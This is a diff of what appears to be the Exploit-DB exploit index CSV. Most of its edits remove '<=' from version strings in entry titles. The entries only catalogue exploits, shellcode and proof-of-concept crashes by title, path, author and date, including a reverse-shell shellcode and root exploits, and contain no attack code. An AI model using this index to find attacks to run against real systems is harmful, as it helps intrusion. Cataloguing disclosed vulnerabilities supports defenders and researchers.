+39309,platforms/php/webapps/39309.txt,"WordPress Booking Calendar Contact Form Plugin 1.1.23 - Unauthenticated SQL injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80 39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 @@ -35561,7 +35561,7 @@ id,file,description,date,author,platform,type,port 39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers Session Hijacking",2014-09-15,"Eric Fajardo",hardware,remote,0 39317,platforms/php/webapps/39317.txt,"WordPress Wordfence Security Plugin - Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0 39318,platforms/multiple/remote/39318.txt,"Laravel 'Hash::make()' Function Password Truncation Security Weakness",2014-09-16,"Pichaya Morimoto",multiple,remote,0 -39319,platforms/php/webapps/39319.txt,"WordPress Booking Calendar Contact Form Plugin <= 1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80 +39319,platforms/php/webapps/39319.txt,"WordPress Booking Calendar Contact Form Plugin 1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80 39320,platforms/php/webapps/39320.txt,"Gongwalker API Manager 1.1 - Blind SQL Injection",2016-01-26,HaHwul,php,webapps,80 39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39322,platforms/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 @@ -35572,9 +35572,9 @@ id,file,description,date,author,platform,type,port 39327,platforms/multiple/dos/39327.txt,"Wireshark dissect_ber_constrained_bitstring Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39328,platforms/android/remote/39328.rb,"Android ADB Debug Server Remote Payload Execution",2016-01-26,Metasploit,android,remote,5555 39329,platforms/windows/dos/39329.py,"InfraRecorder '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos,0 -39330,platforms/windows/dos/39330.txt,"Foxit Reader <= 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 +39330,platforms/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 Denial Of Service",2014-05-14,j0s3h4x0r,windows,dos,0 -39441,platforms/multiple/webapps/39441.txt,"Oracle GlassFish Server <= 4.1 - Directory Traversal",2015-08-27,"Trustwave's SpiderLabs",multiple,webapps,4848 +39441,platforms/multiple/webapps/39441.txt,"Oracle GlassFish Server 4.1 - Directory Traversal",2015-08-27,"Trustwave's SpiderLabs",multiple,webapps,4848 39332,platforms/php/webapps/39332.txt,"Wiser Backup Information Disclosure",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 39333,platforms/php/webapps/39333.html,"WordPress Elegance Theme 'elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 39334,platforms/java/webapps/39334.txt,"Yealink VoIP Phones '/servlet' HTTP Response Splitting",2014-06-12,"Jesus Oquendo",java,webapps,0 @@ -35585,8 +35585,8 @@ id,file,description,date,author,platform,type,port 39338,platforms/linux/shellcode/39338.c,"Linux x86 & x86_64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39339,platforms/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80 39340,platforms/android/local/39340.cpp,"Android - sensord Local Root Exploit",2016-01-27,s0m3b0dy,android,local,0 -39341,platforms/php/webapps/39341.txt,"WordPress Booking Calendar Contact Form <= 1.1.24 - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 -39342,platforms/php/webapps/39342.txt,"WordPress Booking Calendar Contact Form <= 1.1.24 - addslashes SQL Injection",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 +39341,platforms/php/webapps/39341.txt,"WordPress Booking Calendar Contact Form 1.1.24 - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 +39342,platforms/php/webapps/39342.txt,"WordPress Booking Calendar Contact Form 1.1.24 - addslashes SQL Injection",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 39343,platforms/php/webapps/39343.txt,"ol-commerce /OL-Commerce/affiliate_signup.php a_country Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39344,platforms/php/webapps/39344.txt,"ol-commerce /OL-Commerce/affiliate_show_banner.php affiliate_banner_id Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39345,platforms/php/webapps/39345.txt,"ol-commerce /OL-Commerce/create_account.php country Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35641,15 +35641,15 @@ id,file,description,date,author,platform,type,port 39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80 39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow",2016-02-03,LiquidWorm,windows,dos,0 39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Injection Vulnerabilities",2016-02-03,Benetrix,php,webapps,80 -39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal",2016-02-03,ZhaoHuAn,jsp,webapps,80 +39405,platforms/jsp/webapps/39405.py,"Jive Forums 5.5.25 - Directory Traversal",2016-02-03,ZhaoHuAn,jsp,webapps,80 39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0 -39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS Vulnerabilities",2016-02-03,Portcullis,hardware,webapps,0 +39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS",2016-02-03,Portcullis,hardware,webapps,0 39408,platforms/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0 39409,platforms/hardware/webapps/39409.txt,"DLink DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0 39410,platforms/php/webapps/39410.txt,"WordPress User Meta Manager Plugin 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80 39411,platforms/php/webapps/39411.txt,"WordPress User Meta Manager Plugin 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80 39412,platforms/hardware/webapps/39412.txt,"NETGEAR ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0 -39413,platforms/php/webapps/39413.txt,"UliCMS <= v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80 +39413,platforms/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80 39414,platforms/php/webapps/39414.txt,"OpenDocMan 1.3.4 - CSRF",2016-02-04,"Curesec Research Team",php,webapps,80 39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple XSS Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80 39416,platforms/php/webapps/39416.txt,"Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities",2016-02-04,"Sachin Wagh",php,webapps,80 @@ -35659,11 +35659,11 @@ id,file,description,date,author,platform,type,port 39420,platforms/php/webapps/39420.txt,"WordPress User Meta Manager Plugin 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80 39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80 39422,platforms/php/webapps/39422.py,"WordPress WP User Frontend Plugin < 2.3.11 - Unrestricted File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80 -39423,platforms/php/webapps/39423.txt,"WordPress Booking Calendar Contact Form Plugin <= 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80 +39423,platforms/php/webapps/39423.txt,"WordPress Booking Calendar Contact Form Plugin 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80 39424,platforms/android/dos/39424.txt,"Samsung Galaxy S6 - libQjpeg je_free Crash",2016-02-08,"Google Security Research",android,dos,0 39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0 39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0 -39427,platforms/php/webapps/39427.txt,"Employee Timeclock Software 0.99 - SQL Injection Vulnerabilities",2010-03-10,"Secunia Research",php,webapps,0 +39427,platforms/php/webapps/39427.txt,"Employee Timeclock Software 0.99 - SQL Injection",2010-03-10,"Secunia Research",php,webapps,0 39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - .mp3 Crash PoC",2016-02-09,"Shantanu Khandelwal",windows,dos,0 39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2",2016-02-09,"Francis Provencher",windows,dos,0 @@ -35674,11 +35674,11 @@ id,file,description,date,author,platform,type,port 39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80 39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L Authenticated Remote Command Execution",2016-02-10,Metasploit,hardware,remote,0 39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0 -39439,platforms/jsp/remote/39439.txt,"File Replication Pro <= 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0 +39439,platforms/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0 39442,platforms/windows/local/39442.txt,"Windows Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local,0 39443,platforms/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Stack Buffer Overflow Exploit",2016-02-15,LiquidWorm,windows,local,0 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - .pgm Crash PoC",2016-02-15,"Shantanu Khandelwal",windows,dos,0 -39445,platforms/linux/dos/39445.c,"Ntpd <= ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 +39445,platforms/linux/dos/39445.c,"Ntpd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 39446,platforms/win_x86/local/39446.py,"Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0 39447,platforms/windows/dos/39447.py,"Network Scanner Version 4.0.0.0 - SEH Crash POC",2016-02-15,INSECT.B,windows,dos,0 39448,platforms/php/webapps/39448.txt,"Tiny Tiny RSS - Blind SQL Injection",2016-02-15,"Kacper Szurek",php,webapps,80 @@ -35690,7 +35690,7 @@ id,file,description,date,author,platform,type,port 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0 39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0 39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80 -39458,platforms/php/webapps/39458.txt,"OCS Inventory NG <= 2.2 - SQL Injection",2016-02-17,Ephreet,php,webapps,0 +39458,platforms/php/webapps/39458.txt,"OCS Inventory NG 2.2 - SQL Injection",2016-02-17,Ephreet,php,webapps,0 39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0 39461,platforms/multiple/dos/39461.txt,"Adobe Flash - TextField Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0 39462,platforms/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos,0 @@ -35699,7 +35699,7 @@ id,file,description,date,author,platform,type,port 39465,platforms/multiple/dos/39465.txt,"Adobe Flash - ATF Processing Heap Overflow",2016-02-17,"Google Security Research",multiple,dos,0 39466,platforms/multiple/dos/39466.txt,"Adobe Flash - H264 File Stack Corruption",2016-02-17,"Google Security Research",multiple,dos,0 39467,platforms/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",multiple,dos,0 -39468,platforms/php/webapps/39468.txt,"Vesta Control Panel <= 0.9.8-15 - Persistent XSS",2016-02-18,"Necmettin COSKUN",php,webapps,0 +39468,platforms/php/webapps/39468.txt,"Vesta Control Panel 0.9.8-15 - Persistent XSS",2016-02-18,"Necmettin COSKUN",php,webapps,0 39469,platforms/php/webapps/39469.txt,"DirectAdmin 1.491 - CSRF",2016-02-18,"Necmettin COSKUN",php,webapps,0 39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS",2016-02-19,"Pawan Lal",windows,dos,0 39471,platforms/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow SEH (DoS)",2016-02-19,"Shantanu Khandelwal",windows,dos,0 @@ -35725,7 +35725,7 @@ id,file,description,date,author,platform,type,port 39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 -39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino <= R8 Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0 +39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino R8 Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0 39497,platforms/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,ashx,webapps,0 39498,platforms/php/webapps/39498.txt,"WordPress Ocim MP3 Plugin - SQL Injection",2016-02-26,"xevil and Blankon33",php,webapps,80 @@ -35737,7 +35737,7 @@ id,file,description,date,author,platform,type,port 39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0 39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0 39506,platforms/php/webapps/39506.txt,"JSN PowerAdmin Joomla! Extension 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80 -39507,platforms/php/webapps/39507.txt,"WordPress More Fields <= 2.1 Plugin - CSRF",2016-02-29,"Aatif Shahdad",php,webapps,80 +39507,platforms/php/webapps/39507.txt,"WordPress More Fields 2.1 Plugin - CSRF",2016-02-29,"Aatif Shahdad",php,webapps,80 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - SHFolder.DLL Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0 39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - .pm4 Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0 @@ -35759,25 +35759,25 @@ id,file,description,date,author,platform,type,port 39529,platforms/multiple/dos/39529.txt,"Wireshark - wtap_optionblock_free Use-After-Free",2016-03-07,"Google Security Research",multiple,dos,0 39530,platforms/windows/dos/39530.txt,"Avast - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0 39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0 -39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions <= 4.5.0 - .pdf Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0 +39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions 4.5.0 - .pdf Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0 39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80 -39535,platforms/linux/local/39535.sh,"Exim <= 4.84-3 - Local Root Exploit",2016-03-09,"Hacker Fantastic",linux,local,0 +39535,platforms/linux/local/39535.sh,"Exim 4.84-3 - Local Root Exploit",2016-03-09,"Hacker Fantastic",linux,local,0 39536,platforms/php/webapps/39536.txt,"WordPress SiteMile Project Theme 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80 -39537,platforms/linux/dos/39537.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - digi_acceleport Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 -39538,platforms/linux/dos/39538.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - Wacom Multiple Nullpointer Dereferences",2016-03-09,"OpenSource Security",linux,dos,0 -39539,platforms/linux/dos/39539.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - visor (treo_attach) Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 -39540,platforms/linux/dos/39540.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - visor clie_5_attach Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 -39542,platforms/linux/dos/39542.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - cypress_m8 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 -39541,platforms/linux/dos/39541.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - mct_u232 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 -39543,platforms/linux/dos/39543.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - cdc_acm Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 -39544,platforms/linux/dos/39544.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - aiptek Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39537,platforms/linux/dos/39537.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - digi_acceleport Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39538,platforms/linux/dos/39538.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - Wacom Multiple Nullpointer Dereferences",2016-03-09,"OpenSource Security",linux,dos,0 +39539,platforms/linux/dos/39539.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor (treo_attach) Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39540,platforms/linux/dos/39540.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor clie_5_attach Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39542,platforms/linux/dos/39542.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - cypress_m8 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39541,platforms/linux/dos/39541.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - mct_u232 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39543,platforms/linux/dos/39543.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - cdc_acm Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39544,platforms/linux/dos/39544.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - aiptek Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10 / 3.18 / 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0 -39546,platforms/windows/dos/39546.txt,"Nitro Pro <= 10.5.7.32 & Nitro Reader <= 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0 -39547,platforms/php/webapps/39547.txt,"WordPress Best Web Soft Captcha Plugin <= 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80 +39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0 +39547,platforms/php/webapps/39547.txt,"WordPress Best Web Soft Captcha Plugin 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80 39548,platforms/php/webapps/39548.txt,"WordPress WP Advanced Comment Plugin 0.10 - Persistent XSS",2016-03-10,"Mohammad Khaleghi",php,webapps,80 39549,platforms/linux/local/39549.txt,"Exim < 4.86.2 - Local Privilege Escalation",2016-03-10,"Dawid Golunski",linux,local,0 -39550,platforms/multiple/dos/39550.py,"libotr <= 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0 -39551,platforms/multiple/dos/39551.txt,"Putty pscp <= 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0 +39550,platforms/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0 +39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0 39552,platforms/php/webapps/39552.txt,"WordPress Beauty & Clean Theme 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80 39553,platforms/php/webapps/39553.txt,"WordPress DZS Videogallery Plugin <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80 39554,platforms/php/remote/39554.rb,"PHP Utility Belt Remote Code Execution",2016-03-11,Metasploit,php,remote,80 @@ -35793,7 +35793,7 @@ id,file,description,date,author,platform,type,port 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 39626,platforms/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent XSS",2016-03-28,"Sarim Kiani",multiple,webapps,80 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443 -39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22 +39569,platforms/multiple/remote/39569.py,"OpenSSH 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80 39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0 @@ -35809,7 +35809,7 @@ id,file,description,date,author,platform,type,port 39583,platforms/php/webapps/39583.txt,"Xoops 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,php,webapps,80 39584,platforms/php/webapps/39584.txt,"WordPress Image Export Plugin 1.1.0 - Arbitrary File Disclosure",2016-03-21,AMAR^SHG,php,webapps,80 39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share SEH Overflow RCE Exploit",2016-03-21,"Paul Purcell",windows,remote,80 -39586,platforms/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - CSRF Vulnerabilities",2016-03-21,"High-Tech Bridge SA",php,webapps,80 +39586,platforms/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - CSRF",2016-03-21,"High-Tech Bridge SA",php,webapps,80 39587,platforms/php/webapps/39587.txt,"iTop 2.2.1 - CSRF",2016-03-21,"High-Tech Bridge SA",php,webapps,80 39588,platforms/php/webapps/39588.txt,"ProjectSend r582 - Multiple XSS Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80 39589,platforms/php/webapps/39589.txt,"WordPress HB Audio Gallery Lite Plugin 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80 @@ -35822,7 +35822,7 @@ id,file,description,date,author,platform,type,port 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0 39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",multiple,webapps,80 39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 -39622,platforms/hardware/webapps/39622.txt,"Trend Micro Deep Discovery Inspector 3.8/3.7 - CSRF Vulnerabilities",2016-03-27,hyp3rlinx,hardware,webapps,80 +39622,platforms/hardware/webapps/39622.txt,"Trend Micro Deep Discovery Inspector 3.8/3.7 - CSRF",2016-03-27,hyp3rlinx,hardware,webapps,80 39599,platforms/windows/remote/39599.txt,"Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0 39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0 @@ -35848,9 +35848,9 @@ id,file,description,date,author,platform,type,port 39627,platforms/windows/dos/39627.py,"TallSoft SNMP TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69 39628,platforms/linux/local/39628.txt,"FireEye - Malware Input Processor (uid=mip) Privilege Escalation Exploit",2016-03-28,"Google Security Research",linux,local,0 39629,platforms/android/dos/39629.txt,"Android One mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0 -39630,platforms/windows/local/39630.g,"Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege",2016-03-28,mr_me,windows,local,0 +39630,platforms/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script Elevation of Privilege",2016-03-28,mr_me,windows,local,0 39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0 -39632,platforms/linux/remote/39632.py,"LShell <= 0.9.15 - Remote Code Execution",2012-12-30,drone,linux,remote,0 +39632,platforms/linux/remote/39632.py,"LShell 0.9.15 - Remote Code Execution",2012-12-30,drone,linux,remote,0 39633,platforms/multiple/dos/39633.txt,"Apple Quicktime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 1",2016-03-30,"Francis Provencher",multiple,dos,0 39634,platforms/multiple/dos/39634.txt,"Apple Quicktime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 2",2016-03-30,"Francis Provencher",multiple,dos,0 39635,platforms/multiple/dos/39635.txt,"Apple Quicktime < 7.7.79.80.95 - PSD File Parsing Memory Corruption",2016-03-30,"Francis Provencher",multiple,dos,0 @@ -35862,7 +35862,7 @@ id,file,description,date,author,platform,type,port 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,Metasploit,java,remote,8080 